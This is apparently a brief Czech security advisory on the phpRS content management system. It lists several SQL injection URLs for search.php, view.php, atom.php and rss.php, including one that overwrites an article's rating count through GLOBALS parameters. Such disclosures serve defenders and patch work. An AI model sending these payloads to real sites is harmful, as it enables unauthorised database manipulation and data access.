V poslední verzi českého redakčního systému phpRS se nachází několik SQL injekcí.

Simple SQL injection
—————————————–

search.php?GLOBALS[rstext]=%

SQL Query Crash
—————————————–

search.php?GLOBALS[rstema]=nic&GLOBALS[rskde]=vse'&GLOBALS[rsautor]=nic&GLOBALS[rsrazeni]=datum_90&GLOBALS[rsvztah]=OR&GLOBALS[rstext]=php

SQL injection – editace počtu hodnocení
—————————————–

view.php?GLOBALS[cisloclanku]=2001061101&GLOBALS[hlasovani]=1,mn_hodnoceni=1000

SQL injection
—————————————–

atom.php?GLOBALS[mnozstvi]=[SQLi]
rss.php?GLOBALS[mnozstvi]=[SQLi]